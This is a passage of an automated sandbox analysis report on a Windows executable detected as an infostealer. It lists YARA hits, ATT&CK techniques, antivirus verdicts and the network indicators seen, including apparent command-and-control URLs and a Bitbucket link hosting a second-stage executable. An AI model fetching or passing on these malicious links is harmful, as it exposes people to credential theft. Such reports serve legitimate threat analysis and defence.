                Source: Yara matchFile source: 00000000.00000003.1455085981.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1453850480.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1455783102.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1453566886.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1454050433.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1456317993.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1452841763.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1454484117.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1454264424.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: mG83m82qhF.exe PID: 7704, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: mG83m82qhF.exe PID: 7704, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                2
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services41
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                2
                Process Injection
                LSASS Memory751
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                mG83m82qhF.exe55%VirustotalBrowse
                mG83m82qhF.exe63%ReversingLabsWin32.Infostealer.Tinba
                mG83m82qhF.exe100%AviraTR/Crypt.TPM.Gen
                mG83m82qhF.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                52.217.136.89
                truefalse
                  high
                  bitbucket.org
                  185.166.143.49
                  truefalse
                    high
                    cuddlyready.xyz
                    172.67.150.173
                    truefalse
                      high
                      bbuseruploads.s3.amazonaws.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        sendypaster.xyztrue
                          unknown
                          steppriflej.xyztrue
                            unknown
                            smash-boiling.cyoutrue
                              unknown
                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                                high
                                supporse-comment.cyoutrue
                                  unknown
                                  hosue-billowy.cyoutrue
                                    unknown
                                    cuddlyready.xyztrue
                                      unknown
                                      ripe-blade.cyoutrue
                                        unknown
                                        greywe-snotty.cyoutrue
                                          unknown
                                          https://cuddlyready.xyz/apitrue
                                            unknown
                                            pollution-raker.cyoutrue
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabmG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cuddlyready.xyz/mImG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://cuddlyready.xyz/apipmG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_PrmG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cuddlyready.xyz/mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426240498.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://cuddlyready.xyz/DAmG83m82qhF.exe, 00000000.00000003.1372699843.0000000000A93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://cuddlyready.xyz/apiitmG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netmG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgmG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cuddlyready.xyz/2=CmG83m82qhF.exe, 00000000.00000002.2005523294.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://remote-app-switcher.prod-east.frontend.public.atl-paas.netmG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://x1.c.lencr.org/0mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://x1.i.lencr.org/0mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0mG83m82qhF.exe, 00000000.00000002.2005363639.000000000081B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYimG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://cuddlyready.xyz/smG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://aui-cdn.atlassian.com/mG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://bbuseruploads.s3.amazonaws.com:443YKJmG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://cuddlyready.xyz/UsemG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctamG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://cuddlyready.xyz/oumG83m82qhF.exe, 00000000.00000003.1452641021.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://support.mozilla.org/products/firefoxgro.allmG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://cuddlyready.xyz/apimImG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://bitbucket.org/mG83m82qhF.exe, 00000000.00000003.1630581541.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://cuddlyready.xyz/WinmG83m82qhF.exe, 00000000.00000002.2005523294.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://cuddlyready.xyz/RDmG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netmG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exemG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://cuddlyready.xyz/apitemG83m82qhF.exe, 00000000.00000003.1477122557.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icomG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe1mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cuddlyready.xyz/pi5ImG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://web-security-reports.services.atlassian.com/csp-report/bb-websitemG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://ocsp.rootca1.amazontrust.com0:mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://nsis.sf.net/NSIS_ErrorErrormG83m82qhF.exe, 00000000.00000002.2008684160.0000000005959000.00000002.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.0000000005279000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609519898.00000000052B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.ecosia.org/newtab/mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brmG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://dz8aopenkvv6s.cloudfront.netmG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://cuddlyready.xyz/piEHmG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://ac.ecosia.org/autocomplete?q=mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://cuddlyready.xyz:443/apimG83m82qhF.exe, 00000000.00000003.1456773192.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630482824.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1456317993.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454484117.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455686356.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454724980.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452841763.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454957001.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455318191.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454050433.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455516828.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454264424.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455783102.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453162697.0000000000B32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgmG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netmG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://cdn.cookielaw.org/mG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://bitbucket.org/b=mG83m82qhF.exe, 00000000.00000003.1630581541.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://cuddlyready.xyz/ImG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://cuddlyready.xyz:443/apiyrmG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netmG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://cuddlyready.xyz/=ImG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453035473.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453162697.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453850480.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453566886.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454050433.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452841763.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://bbuseruploads.s3.amazonaws.com/mG83m82qhF.exe, 00000000.00000003.1630581541.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              52.217.136.89
                                                                                                                                                                              s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              172.67.150.173
                                                                                                                                                                              cuddlyready.xyzUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              185.166.143.49
                                                                                                                                                                              bitbucket.orgGermany
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1579750
                                                                                                                                                                              Start date and time:2024-12-23 08:30:26 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 6m 17s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:10
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
